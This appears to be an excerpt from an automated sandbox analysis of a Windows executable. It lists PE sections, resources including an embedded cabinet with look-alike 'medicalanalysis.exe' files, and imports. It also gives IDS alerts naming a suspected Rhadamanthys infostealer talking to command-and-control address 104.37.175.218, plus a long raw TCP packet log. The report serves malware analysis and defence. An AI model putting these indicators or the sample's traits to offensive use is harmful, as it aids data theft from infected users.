                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x370000x20.reloc
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                            .text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                            .rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                            .data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                            .pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                            .rsrc0xf0000x280000x27600e4e571280d2873267491d9e9fc12312bFalse0.8101128472222222data7.383985863033746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                            .reloc0x370000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                            AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                                                                                                                                                                                                                                                            RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                                                                                                                                                                                                                                                            RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                                                                                                                                                                                                                                                            RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                                                                                                                                                                                                                                                            RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                                                                                                                                                                                                                                            RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                                                                                                                                                                                                                                                            RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                                                                                                                                                                                                                                                            RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                                                                                                                                                                                                                                                            RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                                                                                                                                                                                                                                                            RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                                                                                                                                                                                                                                                            RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                                                                                                                                                                                                                                            RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                                                                                                                                                                                                                                            RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                                                                                                                                                                                                                                                            RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                                                                                                                                                                                                                                                            RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
                                                                                                                                                                                                                                                                                                            RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
                                                                                                                                                                                                                                                                                                            RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
                                                                                                                                                                                                                                                                                                            RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
                                                                                                                                                                                                                                                                                                            RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
                                                                                                                                                                                                                                                                                                            RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
                                                                                                                                                                                                                                                                                                            RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                                                                                                                                                                                                                                                                            RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
                                                                                                                                                                                                                                                                                                            RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
                                                                                                                                                                                                                                                                                                            RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
                                                                                                                                                                                                                                                                                                            RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
                                                                                                                                                                                                                                                                                                            RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x298700xbf55Microsoft Cabinet archive data, many, 48981 bytes, 2 files, at 0x2c +A "medicalanalysis.exe" +A "medicallanalysis.exe", ID 4018, number 1, 4 datablocks, 0x1503 compressionEnglishUnited States1.000428737673792
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x357c80x4dataEnglishUnited States3.0
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x357cc0x24dataEnglishUnited States0.8055555555555556
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x357f00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x357f80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x358000x4dataEnglishUnited States3.0
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x358040x17ASCII text, with no line terminatorsEnglishUnited States1.3478260869565217
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x3581c0x4dataEnglishUnited States3.0
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x358200x16dataEnglishUnited States1.3636363636363635
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x358380x4dataEnglishUnited States3.0
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x3583c0x4dataEnglishUnited States3.0
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x358400x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                                                                                                                                                                                                            RT_RCDATA0x358480x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                                                                                                                                                                                                            RT_GROUP_ICON0x358500xbcdataEnglishUnited States0.6117021276595744
                                                                                                                                                                                                                                                                                                            RT_VERSION0x3590c0x408dataEnglishUnited States0.42151162790697677
                                                                                                                                                                                                                                                                                                            RT_MANIFEST0x35d140x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                                                                                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                                                                            ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                                                                                                                            KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                                                                                                                                                                                                                                                                            GDI32.dllGetDeviceCaps
                                                                                                                                                                                                                                                                                                            USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                                                                                                                                                                                                                                                                            msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                                                                                                                                                                                                                                                                            COMCTL32.dll
                                                                                                                                                                                                                                                                                                            Cabinet.dll
                                                                                                                                                                                                                                                                                                            VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                                                                                                                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                            2024-12-22T23:56:59.502250+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.37.175.2187982192.168.2.449738TCP
                                                                                                                                                                                                                                                                                                            2024-12-22T23:57:23.800331+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.37.175.2187982192.168.2.449802TCP
                                                                                                                                                                                                                                                                                                            2024-12-22T23:57:23.800331+01002854824ETPRO JA3 HASH Suspected Malware Related Response2104.37.175.2187982192.168.2.449802TCP
                                                                                                                                                                                                                                                                                                            2024-12-22T23:57:34.987061+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.37.175.2187982192.168.2.449831TCP
                                                                                                                                                                                                                                                                                                            2024-12-22T23:57:34.987061+01002854824ETPRO JA3 HASH Suspected Malware Related Response2104.37.175.2187982192.168.2.449831TCP

                                                                                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:04.108967066 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:04.109050989 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:04.109141111 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:04.125066996 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:04.125111103 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.084243059 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.084367037 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.091141939 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.091185093 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.091423035 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.132262945 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.155622005 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.203342915 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780189037 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780214071 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780225039 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780246019 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780302048 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780323029 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780406952 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780453920 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780453920 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.780487061 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.925354958 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.925395966 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.925518036 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.925551891 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.925611973 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.999104977 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.999126911 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.999222040 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.999254942 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:06.999305010 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.093370914 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.093400955 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.093498945 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.093580008 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.093611002 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.093657017 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.129395008 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.129421949 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.129533052 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.129609108 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.129664898 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.202749968 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.202774048 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.202868938 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.202897072 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.202965021 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.242765903 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.242803097 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.242921114 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.242940903 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.243103027 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.287045002 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.287067890 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.287298918 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.287339926 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.287403107 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.341958046 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.341984987 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.342107058 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.342153072 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.342226982 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.360204935 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.360224962 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.360292912 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.360311985 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.360332966 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.360418081 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.406805038 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.406857014 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.406953096 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.406972885 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.407016039 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.407036066 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.423624039 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.423669100 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.423752069 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.423769951 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.423798084 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.423851967 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.483329058 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.483392000 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.483436108 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.483452082 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.483468056 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.483560085 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.496576071 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.496597052 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.496679068 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.496692896 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.496800900 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.507271051 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.507292032 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.507354021 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.507369041 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.507384062 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.507425070 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.519640923 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.519661903 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.519738913 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.519752979 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.519807100 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.531568050 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.531635046 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.531682014 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.531745911 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.531769991 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.531805992 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.543719053 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.543783903 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.543837070 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.543874979 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.543895006 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.543924093 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.628261089 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.628318071 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.628360987 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.628391027 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.628405094 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.628503084 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.637736082 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.637787104 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.637825966 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.637849092 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.637861967 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.637929916 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.668953896 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.669027090 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.669049025 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.669071913 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.669094086 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.669133902 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.675874949 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.675925016 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.675967932 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.675992012 CET443497305.2.81.126192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.676004887 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.676088095 CET49730443192.168.2.45.2.81.126
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:07.682853937 CET443497305.2.81.126192.168.2.4
